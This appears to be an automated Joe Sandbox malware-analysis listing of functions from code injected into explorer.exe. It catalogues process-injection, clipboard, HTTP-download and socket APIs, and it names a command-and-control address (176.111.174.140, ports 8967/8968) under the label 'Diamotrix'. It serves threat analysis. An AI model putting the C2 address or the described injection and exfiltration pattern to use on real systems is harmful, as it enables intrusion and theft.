                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$AllocCreateMemoryProcessProtectRemoteThreadWrite
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 1113946311-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: 96c6cd3d82ebe1995057aabc335eaf136b016837e53eff7ea375e66e7f7c8d61
                                                                                                                                                                                                                                                    • Instruction ID: f8ce08ea07d4c344833e145f8babb90885d0fb7689461a860ed47dc438729229
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96c6cd3d82ebe1995057aabc335eaf136b016837e53eff7ea375e66e7f7c8d61
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0214832315B8097DB65CF52B940B6AB6A6F788BC4F54812AEE8E53B18DF39C445CB00
                                                                                                                                                                                                                                                    Function 0F4A4420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77injectionmemorythreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$AllocCreateMemoryProcessProtectRemoteThreadWrite
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 1113946311-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: 96c6cd3d82ebe1995057aabc335eaf136b016837e53eff7ea375e66e7f7c8d61
                                                                                                                                                                                                                                                    • Instruction ID: aef360562d6382c97ec9424ccdb50e31c78d37b65a16ec9b141513f4b23ee84f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96c6cd3d82ebe1995057aabc335eaf136b016837e53eff7ea375e66e7f7c8d61
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8213C32306B4196EB24CF17B540B6BB6A5B758BD8F44413AAE8D53B28DB7DC005CB00
                                                                                                                                                                                                                                                    Function 0E8F4420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77injectionmemorythreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$AllocCreateMemoryProcessProtectRemoteThreadWrite
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 1113946311-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: 96c6cd3d82ebe1995057aabc335eaf136b016837e53eff7ea375e66e7f7c8d61
                                                                                                                                                                                                                                                    • Instruction ID: 0924069cd90d8251cba9bcdad1e99a9e06ac66ed03c1ca1c56a18b00e75bbbdb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96c6cd3d82ebe1995057aabc335eaf136b016837e53eff7ea375e66e7f7c8d61
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91216B72305B8182DB24CF52B950B2BB6A5FB8CBC8F44412AEF9D93B18DB38C505CB00
                                                                                                                                                                                                                                                    Function 0E908390 Relevance: 7.5, APIs: 5, Instructions: 42clipboardCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1006321803-0
                                                                                                                                                                                                                                                    • Opcode ID: 681bfd7b9a529a093bc5f4f9ee533b49214d0e473a73f73fce6e6f8c86b06430
                                                                                                                                                                                                                                                    • Instruction ID: ebd6af7a17654a3cba709ea2e9eac26a819cc74da53e68d9973c82eea255c081
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 681bfd7b9a529a093bc5f4f9ee533b49214d0e473a73f73fce6e6f8c86b06430
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3801DF22314B8183EE189B26F95432AA361BB88FC0F481434DE1A07768DF3CC4828B00
                                                                                                                                                                                                                                                    Function 10D8F348 Relevance: .0, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5281586a3efebec586c7508695a568e82aae5dc05f7a224c0fe3b2ab43128736
                                                                                                                                                                                                                                                    • Instruction ID: 6e76516baa280d013fed1f08c1d5c5c8231fc3cbf7ab12db26d954aa001e4d20
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5281586a3efebec586c7508695a568e82aae5dc05f7a224c0fe3b2ab43128736
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FE0B697E5AFD44BD75246200CA50A82F61E5A295035F418BCB84D7283B45C2D0A9251
                                                                                                                                                                                                                                                    Function 0F4CF348 Relevance: .0, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5281586a3efebec586c7508695a568e82aae5dc05f7a224c0fe3b2ab43128736
                                                                                                                                                                                                                                                    • Instruction ID: ffdda85db4cc9b6199768b4ff4766d6e5f88892efb41644d4fcead9d7a3114fe
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5281586a3efebec586c7508695a568e82aae5dc05f7a224c0fe3b2ab43128736
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CFE04F9BD19BD05BC7A245200C640592F2295A282039E518FCE44CFB93744C2D0E82B1
                                                                                                                                                                                                                                                    Function 10D8F398 Relevance: .0, Instructions: 11COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 4db3d51f8340a71b9297d3342e3b9576806a1b3d723e1fd14d7a3a41800ba801
                                                                                                                                                                                                                                                    • Instruction ID: 71107aa61474c87e62b066724992ac545c1cb3424d26455cf7b0fde0eefe5073
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4db3d51f8340a71b9297d3342e3b9576806a1b3d723e1fd14d7a3a41800ba801
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77C04CE7E15F948BD36289200CA10A43B31F6B695035E014ACE25D714174282D0F6651
                                                                                                                                                                                                                                                    Function 0F4CF398 Relevance: .0, Instructions: 11COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 4db3d51f8340a71b9297d3342e3b9576806a1b3d723e1fd14d7a3a41800ba801
                                                                                                                                                                                                                                                    • Instruction ID: 7547a7f38d13ddd8cec1b5bc88e5b26a4fd320bd35d1be097c6a6e51fc925fb0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4db3d51f8340a71b9297d3342e3b9576806a1b3d723e1fd14d7a3a41800ba801
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14C04CEBD15F949BD3B289640CA00992B32F6B692039E114E8D25DB652742C2D0F66B1
                                                                                                                                                                                                                                                    Function 10DA0F90 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8b244b4f70fad90b39670434564d88c45866e8bd85f7bd71bacdac0a2d37a02e
                                                                                                                                                                                                                                                    • Instruction ID: 64eb827843a169c03c96310a4ccc37c2c3cad70a1234098c9b36842960194999
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b244b4f70fad90b39670434564d88c45866e8bd85f7bd71bacdac0a2d37a02e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                    Function 0F4E0F90 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8b244b4f70fad90b39670434564d88c45866e8bd85f7bd71bacdac0a2d37a02e
                                                                                                                                                                                                                                                    • Instruction ID: ee7156f6d5acdc5c976aecb1d206c75d5c53b06297d062616f08666529e14553
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b244b4f70fad90b39670434564d88c45866e8bd85f7bd71bacdac0a2d37a02e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                    Function 0E930F90 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8b244b4f70fad90b39670434564d88c45866e8bd85f7bd71bacdac0a2d37a02e
                                                                                                                                                                                                                                                    • Instruction ID: ebbb7ff359d36fa51127193798d5810c363544c5e89fd51e6d3e86d056d00968
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b244b4f70fad90b39670434564d88c45866e8bd85f7bd71bacdac0a2d37a02e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                    Function 10D8F318 Relevance: .0, Instructions: 1COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                                                    • Instruction ID: 33f440db8dcf76ed1806d7bd443262935e64228566635c654bb1f16f699d93a5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                    Function 0F4CF318 Relevance: .0, Instructions: 1COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                                                    • Instruction ID: 33f440db8dcf76ed1806d7bd443262935e64228566635c654bb1f16f699d93a5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                    Function 0E91F318 Relevance: .0, Instructions: 1COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                                                    • Instruction ID: 33f440db8dcf76ed1806d7bd443262935e64228566635c654bb1f16f699d93a5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                    Function 10D61670 Relevance: 42.1, APIs: 23, Strings: 1, Instructions: 149networksleepmemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 10D61693
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandle$OpenSleep$FileHeapHttpInfoQueryRead$AllocProcess
                                                                                                                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                    • API String ID: 714119200-2771526726
                                                                                                                                                                                                                                                    • Opcode ID: 384de69ec04138204dab6b61158154f53a495085d1ff4d816daf9c9824de2aa6
                                                                                                                                                                                                                                                    • Instruction ID: c2afca0437e70e408927890db29fd3e5884f4ae144cb174e9e3a6b2373f99fcd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 384de69ec04138204dab6b61158154f53a495085d1ff4d816daf9c9824de2aa6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE51537531468187E7509FA9F81479A77A4FB88BC9F58C066DECA43B14DF7CC4858B10
                                                                                                                                                                                                                                                    Function 0F4A1670 Relevance: 42.1, APIs: 23, Strings: 1, Instructions: 149networksleepmemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 0F4A1693
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandle$OpenSleep$FileHeapHttpInfoQueryRead$AllocProcess
                                                                                                                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                    • API String ID: 714119200-2771526726
                                                                                                                                                                                                                                                    • Opcode ID: 384de69ec04138204dab6b61158154f53a495085d1ff4d816daf9c9824de2aa6
                                                                                                                                                                                                                                                    • Instruction ID: e1336cffc3f283f505cd6ff2770e357056b6c7372ca9b7cf43365b3c9feff0e7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 384de69ec04138204dab6b61158154f53a495085d1ff4d816daf9c9824de2aa6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3051BF7920569183EBB08F26B81476B63A1FBD8B95F44A035DD8A07F14DF3CC0499B64
                                                                                                                                                                                                                                                    Function 10D7A6F0 Relevance: 36.9, APIs: 17, Strings: 4, Instructions: 137networkCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: getaddrinfo$CleanupStartup
                                                                                                                                                                                                                                                    • String ID: 176.111.174.140$8967$8968$Diamotrix
                                                                                                                                                                                                                                                    • API String ID: 2621939305-1134542788
                                                                                                                                                                                                                                                    • Opcode ID: 0e7ccb38dd5bd9deef4434c16518ed60c60d2a3690e12375bb07e02314a67881
                                                                                                                                                                                                                                                    • Instruction ID: dad8c46fd2613446b7c281d191e86d131a1605e628abb3e643d1f5dc34918310
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e7ccb38dd5bd9deef4434c16518ed60c60d2a3690e12375bb07e02314a67881
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84516136204A4182EB109FA9F8543DA7360F788BF8F548317EAAD476E4DF78C58AC751
                                                                                                                                                                                                                                                    Function 0F4BA6F0 Relevance: 36.9, APIs: 17, Strings: 4, Instructions: 137networkCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: getaddrinfo$CleanupStartup
                                                                                                                                                                                                                                                    • String ID: 176.111.174.140$8967$8968$Diamotrix
                                                                                                                                                                                                                                                    • API String ID: 2621939305-1134542788
                                                                                                                                                                                                                                                    • Opcode ID: 0e7ccb38dd5bd9deef4434c16518ed60c60d2a3690e12375bb07e02314a67881
                                                                                                                                                                                                                                                    • Instruction ID: afec1732c0ac3112babe0c3092f7d0183c7a18cc5b642bc18ae22ea547f92a5e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e7ccb38dd5bd9deef4434c16518ed60c60d2a3690e12375bb07e02314a67881
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73517432205A4181EB609F25E8443EB7361F794BB4F841326DE6E47AE5DF3CD58ACB60
                                                                                                                                                                                                                                                    Function 0E90A6F0 Relevance: 36.9, APIs: 17, Strings: 4, Instructions: 137networkCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: getaddrinfo$CleanupStartup
                                                                                                                                                                                                                                                    • String ID: 176.111.174.140$8967$8968$Diamotrix
                                                                                                                                                                                                                                                    • API String ID: 2621939305-1134542788
                                                                                                                                                                                                                                                    • Opcode ID: 0e7ccb38dd5bd9deef4434c16518ed60c60d2a3690e12375bb07e02314a67881
                                                                                                                                                                                                                                                    • Instruction ID: da116774e217ff00baa90f608e00f4eab85c6e0b54d6ed80510622641b888272
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e7ccb38dd5bd9deef4434c16518ed60c60d2a3690e12375bb07e02314a67881
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38515E32305A85C6EB20DF25E85839A7374FB44BB4F840715DA6D976E8DF78C94ACB40
                                                                                                                                                                                                                                                    Function 0E8F8890 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 107stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32 ref: 0E8F88D8
                                                                                                                                                                                                                                                    • RtlInitializeCriticalSection.NTDLL ref: 0E8F88E5
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32 ref: 0E8F891A
                                                                                                                                                                                                                                                      • Part of subcall function 0E8FE450: GetWindowsDirectoryA.KERNEL32 ref: 0E8FE49C
                                                                                                                                                                                                                                                      • Part of subcall function 0E8FE450: GetVolumeInformationA.KERNEL32 ref: 0E8FE4E6
                                                                                                                                                                                                                                                      • Part of subcall function 0E8FE450: wsprintfA.USER32 ref: 0E8FE547
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32 ref: 0E8F893D
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 0E8F894D
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32 ref: 0E8F89E4
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: send.WS2_32 ref: 0E8F692C
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: recv.WS2_32 ref: 0E8F6993
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcmpiA.KERNEL32 ref: 0E8F69F3
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrlenA.KERNEL32 ref: 0E8F6A17
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: StrStrA.SHLWAPI ref: 0E8F6A2F
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcmpiA.KERNEL32 ref: 0E8F6A4E
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: strtol.MSVCRT ref: 0E8F6A66
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 0E8F895D
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcpyA.KERNEL32 ref: 0E8F675E
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcatA.KERNEL32 ref: 0E8F676F
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcatA.KERNEL32 ref: 0E8F6783
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcatA.KERNEL32 ref: 0E8F6797
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcatA.KERNEL32 ref: 0E8F67A8
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcatA.KERNEL32 ref: 0E8F67BC
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcatA.KERNEL32 ref: 0E8F67DA
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: wsprintfA.USER32 ref: 0E8F67F2
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcatA.KERNEL32 ref: 0E8F6806
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcatA.KERNEL32 ref: 0E8F681A
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcatA.KERNEL32 ref: 0E8F6856
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: WSAStartup.WS2_32 ref: 0E8F6866
